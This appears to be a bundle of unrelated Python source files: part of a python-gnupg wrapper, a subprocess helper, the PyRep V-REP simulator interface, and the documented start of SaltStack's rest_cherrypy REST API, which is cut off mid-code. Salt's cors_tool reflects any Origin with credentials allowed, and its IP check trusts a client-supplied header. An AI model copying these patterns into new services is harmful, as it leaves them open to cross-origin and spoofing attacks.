>>> result.status == 'decryption ok'
True
>>> str(result)
'hello again'
>>> result = gpg.encrypt("signed hello", fp2, sign=fp1, passphrase='pp1')
>>> result.status == 'encryption ok'
True
>>> message = str(result)
>>> result = gpg.decrypt(message, passphrase='pp2')
>>> result.status == 'decryption ok'
True
>>> assert result.fingerprint == fp1
"""
data = _make_binary_stream(data, self.encoding)
result = self.encrypt_file(data, recipients, **kwargs)
data.close()
return result
def decrypt(self, message, **kwargs):
data = _make_binary_stream(message, self.encoding)
result = self.decrypt_file(data, **kwargs)
data.close()
return result
def decrypt_file(self, file, always_trust=False, passphrase=None,
output=None, extra_args=None):
args = ["--decrypt"]
if output: # write the output to a file with the specified name
self.set_output_without_confirmation(args, output)
if always_trust: # pragma: no cover
args.append("--always-trust")
if extra_args:
args.extend(extra_args)
result = self.result_map['crypt'](self)
self._handle_io(args, file, result, passphrase, binary=True)
logger.debug('decrypt result: %r', result.data)
return result
def trust_keys(self, fingerprints, trustlevel):
levels = Verify.TRUST_LEVELS
if trustlevel not in levels:
poss = ', '.join(sorted(levels))
raise ValueError('Invalid trust level: "%s" (must be one of %s)' %
(trustlevel, poss))
trustlevel = levels[trustlevel] + 2
import tempfile
try:
fd, fn = tempfile.mkstemp()
lines = []
if isinstance(fingerprints, string_types):
fingerprints = [fingerprints]
for f in fingerprints:
lines.append('%s:%s:' % (f, trustlevel))
# The trailing newline is required!
s = os.linesep.join(lines) + os.linesep
logger.debug('writing ownertrust info: %s', s);
os.write(fd, s.encode(self.encoding))
os.close(fd)
result = self.result_map['delete'](self)
p = self._open_subprocess(['--import-ownertrust', fn])
self._collect_output(p, result, stdin=p.stdin)
finally:
os.remove(fn)
return result
|
cmd.py
|
import subprocess
from utlz import func_has_arg, namedtuple
CmdResult = namedtuple(
typename='CmdResult',
field_names=[
'exitcode',
'stdout', # type: bytes
'stderr', # type: bytes
'cmd',
'input',
],
lazy_vals={
'stdout_str': lambda self: self.stdout.decode('utf-8'),
'stderr_str': lambda self: self.stderr.decode('utf-8'),
}
)
def run_cmd(cmd, input=None, timeout=30, max_try=3, num_try=1):
'''Run command `cmd`.
It's like that, and that's the way it is.
'''
if type(cmd) == str:
cmd = cmd.split()
process = subprocess.Popen(cmd,
stdin=open('/dev/null', 'r'),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
communicate_has_timeout = func_has_arg(func=process.communicate,
arg='timeout')
exception = Exception
if communicate_has_timeout:
exception = subprocess.TimeoutExpired # python 3.x
stdout = stderr = b''
exitcode = None
try:
if communicate_has_timeout:
# python 3.x
stdout, stderr = process.communicate(input, timeout)
exitcode = process.wait()
else:
# python 2.x
if timeout is None:
stdout, stderr = process.communicate(input)
exitcode = process.wait()
else:
# thread-recipe: https://stackoverflow.com/a/4825933
def target():
# closure-recipe: https://stackoverflow.com/a/23558809
target.out, target.err = process.communicate(input)
import threading
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
process.terminate()
thread.join()
exitcode = None
else:
exitcode = process.wait()
stdout = target.out
stderr = target.err
except exception:
if num_try < max_try:
return run_cmd(cmd, input, timeout, max_try, num_try+1)
else:
return CmdResult(exitcode, stdout, stderr, cmd, input)
return CmdResult(exitcode, stdout, stderr, cmd, input)
|
pyrep.py
|
from pyrep.backend import vrep, utils
from pyrep.objects.object import Object
from pyrep.objects.shape import Shape
from pyrep.textures.texture import Texture
from pyrep.errors import PyRepError
import os
import sys
import time
import threading
from threading import Lock
from typing import Tuple, List
class PyRep(object):
"""Used for interfacing with the V-REP simulation.
Can be used for starting, stopping, and stepping the simulation. As well
as getting, and creating scene objects and robots.
"""
def __init__(self):
self.running = False
self._process = None
self._robot_to_count = {}
self.connected = False
self._ui_thread = None
self._responsive_ui_thread = None
self._step_lock = Lock()
self._init_thread_id = None
self._shutting_down = False
self._handles_to_objects = {}
if 'VREP_ROOT' not in os.environ:
raise PyRepError(
'VREP_ROOT not defined. See installation instructions.')
self._vrep_root = os.environ['VREP_ROOT']
if not os.path.exists(self._vrep_root):
raise PyRepError(
'VREP_ROOT was not a correct path. '
'See installation instructions')
def _run_ui_thread(self, scene_file: str, headless: bool) -> None:
# Need this otherwise extensions will not be loaded
os.chdir(self._vrep_root)
options = vrep.sim_gui_headless if headless else vrep.sim_gui_all
vrep.simExtLaunchUIThread(options=options, scene=scene_file,
pyrep_root=self._vrep_root)
def _run_responsive_ui_thread(self) -> None:
while True:
if not self.running:
with self._step_lock:
if self._shutting_down or vrep.simExtGetExitRequest():
break
vrep.simExtStep(False)
time.sleep(0.01)
# If the exit request was from the UI, then call shutdown, otherwise
# shutdown caused this thread to terminate.
if not self._shutting_down:
self.shutdown()
def launch(self, scene_file="", headless=False, responsive_ui=False,
blocking=False) -> None:
"""Launches V-REP.
Launches the UI thread, waits until the UI thread has finished, this
results in the current thread becoming the simulation thread.
:param scene_file: The scene file to load. Empty string for empty scene.
:param headless: Run V-REP in simulation mode.
:param responsive_ui: If True, then a separate thread will be created to
asynchronously step the UI of V-REP. Note, that will reduce
the responsiveness of the simulation thread.
:param blocking: Causes V-REP to launch as if running the default c++
client application. This is causes the function to block. For most
users, this will be set to False.
"""
if len(scene_file) > 0 and not os.path.isfile(
os.path.abspath(scene_file)):
raise PyRepError('Scene file does not exist: %s' % scene_file)
self._ui_thread = threading.Thread(target=self._run_ui_thread,
args=(scene_file, headless))
self._ui_thread.daemon = True
self._ui_thread.start()
while not vrep.simExtCanInitSimThread():
time.sleep(0.1)
vrep.simExtSimThreadInit()
time.sleep(0.2) # Stops V-REP crashing if it is restarted too quickly.
if blocking:
while not vrep.simExtGetExitRequest():
vrep.simExtStep()
self.shutdown()
elif responsive_ui:
self._responsive_ui_thread = threading.Thread(
target=self._run_responsive_ui_thread)
self._responsive_ui_thread.daemon = True
try:
self._responsive_ui_thread.start()
except (KeyboardInterrupt, SystemExit):
if not self._shutting_down:
self.shutdown()
sys.exit()
self.step()
else:
self.step()
def script_call(self, function_name_at_script_name: str,
script_handle_or_type: int,
ints=(), floats=(), strings=(), bytes='') -> (
Tuple[List[int], List[float], List[str], str]):
"""Calls a script function (from a plugin, the main client application,
or from another script). This represents a callback inside of a script.
:param function_name_at_script_name: A string representing the function
name and script name, e.g. myFunctionName@theScriptName. When the
script is not associated with an object, then just specify the
function name.
:param script_handle_or_type: The handle of the script, otherwise the
type of the script.
:param ints: The input ints to the script.
:param floats: The input floats to the script.
:param strings: The input strings to the script.
:param bytes: The input bytes to the script (as a string).
:return: Any number of return values from the called Lua function.
"""
return utils.script_call(
function_name_at_script_name, script_handle_or_type, ints, floats,
strings, bytes)
def shutdown(self) -> None:
"""Shuts down the V-REP simulation.
"""
if self._ui_thread is None:
raise PyRepError('V-REP has not been launched. Call launch first.')
if self._ui_thread is not None:
self._shutting_down = True
self.stop()
self.step_ui()
vrep.simExtPostExitRequest()
vrep.simExtSimThreadDestroy()
self._ui_thread.join()
if self._responsive_ui_thread is not None:
self._responsive_ui_thread.join()
# V-REP crashes if new instance opened too quickly after shutdown.
# TODO: A small sleep stops this for now.
time.sleep(0.1)
self._ui_thread = None
self._shutting_down = False
def start(self) -> None:
"""Starts the physics simulation if it is not already running.
"""
if self._ui_thread is None:
raise PyRepError('V-REP has not been launched. Call launch first.')
if not self.running:
vrep.simStartSimulation()
self.running = True
def stop(self) -> None:
"""Stops the physics simulation if it is running.
"""
if self._ui_thread is None:
raise PyRepError('V-REP has not been launched. Call launch first.')
if self.running:
vrep.simStopSimulation()
self.running = False
# Need this so the UI updates
[self.step() for _ in range(5)]
def step(self) -> None:
"""Execute the next simulation step.
If the physics simulation is not running, then this will only update
the UI.
"""
with self._step_lock:
vrep.simExtStep()
def step_ui(self) -> None:
"""Update the UI.
This will not execute the next simulation step, even if the physics
simulation is running.
This is only applicable when PyRep was launched without a responsive UI.
"""
with self._step_lock:
vrep.simExtStep(False)
def set_simulation_timestep(self, dt: float) -> None:
"""Sets the simulation time step.
:param dt: The time step value.
"""
vrep.simSetFloatParameter(vrep.sim_floatparam_simulation_time_step, dt)
def set_configuration_tree(self, config_tree: bytes) -> None:
"""Restores configuration information previously retrieved.
Configuration information (object relative positions/orientations,
joint/path values) can be retrieved with
:py:meth:`Object.get_configuration_tree`. Dynamically simulated
objects will implicitly be reset before the command is applied
(i.e. similar to calling :py:meth:`Object.reset_dynamic_object` just
before).
:param config_tree: The configuration tree to restore.
"""
vrep.simSetConfigurationTree(config_tree)
def group_objects(self, objects: List[Shape]) -> Shape:
"""Groups several shapes into a compound shape (or simple shape).
:param objects: The list of shapes to group.
:return: A single grouped shape.
"""
handles = [o.get_handle() for o in objects]
handle = vrep.simGroupShapes(handles)
return Shape(handle)
def merge_objects(self, objects: List[Shape]) -> Shape:
"""Merges several shapes into a compound shape (or simple shape).
:param objects: The list of shapes to group.
:return: A single merged shape.
"""
handles = [o.get_handle() for o in objects]
handle = vrep.simGroupShapes(handles, merge=True)
return Shape(handle)
def import_model(self, filename: str) -> Object:
""" Loads a previously saved model.
:param filename: model filename. The filename extension is required
("ttm"). An optional "@copy" can be appended to the filename, in
which case the model's objects will be named/renamed as if an
associated script was attached to the model.
:return: The imported model.
"""
handle = vrep.simLoadModel(filename)
return utils.to_type(handle)
def create_texture(self, filename: str, interpolate=True, decal_mode=False,
repeat_along_u=False, repeat_along_v=False
) -> Tuple[Shape, Texture]:
"""Creates a planar shape that is textured.
:param filename: Path to the texture to load.
:param interpolate: Adjacent texture pixels are not interpolated.
:param decal_mode: Texture is applied as a decal (its appearance
won't be influenced by light conditions).
:param repeat_along_u: Texture will be repeated along the U direction.
:param repeat_along_v: Texture will be repeated along the V direction.
:return: A tuple containing the textured plane and the texture.
"""
options = 0
if not interpolate:
options |= 1
if decal_mode:
options |= 2
if repeat_along_u:
options |= 3
if repeat_along_v:
options |= 4
handle = vrep.simCreateTexture(filename, options)
s = Shape(handle)
return s, s.get_texture()
|
app.py
|
"""
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
.. note::
This module is Experimental on Windows platforms and supports limited
configurations:
- doesn't support PAM authentication (i.e. external_auth: auto)
- doesn't support SSL (i.e. disable_ssl: True)
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log.access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log.error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running asynchronous jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
"""
import functools
import io
import itertools
import logging
import os
import signal
import tarfile
from collections.abc import Iterator, Mapping
from multiprocessing import Pipe, Process
from urllib.parse import parse_qsl
import cherrypy # pylint: disable=import-error,3rd-party-module-not-gated
import salt
import salt.auth
import salt.exceptions
import salt.netapi
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
logger = logging.getLogger(__name__)
try:
from cherrypy.lib import ( # pylint: disable=import-error,3rd-party-module-not-gated
cpstats,
)
except AttributeError:
cpstats = None
logger.warn(
"Import of cherrypy.cpstats failed. "
"Possible upstream bug: "
"https://github.com/cherrypy/cherrypy/issues/1444"
)
except ImportError:
cpstats = None
logger.warn("Import of cherrypy.cpstats failed.")
try:
# Imports related to websocket
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type("websockets", (object,), {"SynchronizingWebsocket": None})
HAS_WEBSOCKETS = False
def html_override_tool():
"""
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
"""
apiopts = cherrypy.config["apiopts"]
request = cherrypy.request
url_blacklist = (
apiopts.get("app_path", "/app"),
apiopts.get("static_path", "/static"),
)
if "app" not in cherrypy.config["apiopts"]:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get("Accept") == "*/*":
return
try:
wants_html = cherrypy.lib.cptools.accept("text/html")
except cherrypy.HTTPError:
return
else:
if wants_html != "text/html":
return
raise cherrypy.InternalRedirect(apiopts.get("app_path", "/app"))
def salt_token_tool():
"""
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
"""
x_auth = cherrypy.request.headers.get("X-Auth-Token", None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie["session_id"] = x_auth
def salt_api_acl_tool(username, request):
"""
.. versionadded:: 2016.3.0
Verifies user requests against the API whitelist. (User/IP pair)
in order to provide whitelisting for the API similar to the
master, but over the API.
..code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
"""
failure_str = "[api_acl] Authentication failed for " "user {0} from IP {1}"
success_str = "[api_acl] Authentication successful for user {0} from IP {1}"
pass_str = "[api_acl] Authentication not checked for " "user {0} from IP {1}"
acl = None
# Salt Configuration
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get("api_acl", None)
ip = request.remote.ip
if acl:
users = acl.get("users", {})
if users:
if username in users:
if ip in users[username] or "*" in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and "*" in users:
if ip in users["*"] or "*" in users["*"]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
"""
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
"""
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get("authorized_ips", None)
if auth_ip_list:
logger.debug("Found IP list: {}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get("Remote-Addr", None)
logger.debug("Request from IP: {}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {}".format(rem_ip))
raise cherrypy.HTTPError(403, "Bad IP")
def salt_auth_tool():
"""
Redirect all unauthenticated requests to the login page
"""
# Redirect to the login page if the session hasn't been authed
if "token" not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers["Cache-Control"] = "private"
def cors_tool():
"""
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
"""
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head["Access-Control-Allow-Origin"] = req_head.get("Origin", "*")
resp_head["Access-Control-Expose-Headers"] = "GET, POST"
resp_head["Access-Control-Allow-Credentials"] = "true"
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == "OPTIONS":
ac_method = req_head.get("Access-Control-Request-Method", None)
allowed_methods = ["GET", "POST"]
allowed_headers = [
"Content-Type",
"X-Auth-Token",
"X-Requested-With",
]
if ac_method and ac_method in allowed_methods:
resp_head["Access-Control-Allow-Methods"] = ", ".join(allowed_methods)
resp_head["Access-Control-Allow-Headers"] = ", ".join(allowed_headers)
resp_head["Connection"] = "keep-alive"
resp_head["Access-Control-Max-Age"] = "1400"
# Note: CherryPy on Py3 uses binary objects for the response
# Python 2.6 also supports the byte prefix, so no need for conditionals
cherrypy.response.body = b""
cherrypy.response.status = 200
# CORS requests should short-circuit the other tools.
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session["token"] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
("application/json", salt.utils.json.dumps),
(
"application/x-yaml",
